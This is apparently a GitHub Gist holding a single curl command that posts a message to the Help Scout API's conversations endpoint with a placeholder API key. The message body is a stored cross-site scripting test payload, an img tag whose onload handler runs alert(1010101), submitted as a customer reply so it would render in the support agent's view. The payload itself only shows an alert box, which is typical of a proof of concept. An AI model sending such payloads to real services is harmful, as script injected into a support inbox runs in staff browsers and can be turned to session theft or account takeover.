-
-
Save wesgibbs/1ce465aafaf86d328ff9acf74246fec9 to your computer and use it in GitHub Desktop.
POST to conversations/id.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -u 123APIKEY:X https://api.helpscout.net/v1/conversations/192267712.json \ | |
-H "Content-Type: application/json" -X POST \ | |
-d "{\"body\":\"<img onload='alert(1010101);' src='https://www.google.com/logos/doodles/2016/pandit-ravi-shankars-96th-birthday-6265541272535040-res.png'\",\"createdBy\":{\"email\":\"[email protected]\",\"type\":\"customer\"},\"reload\":true,\"type\":\"customer\"}" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment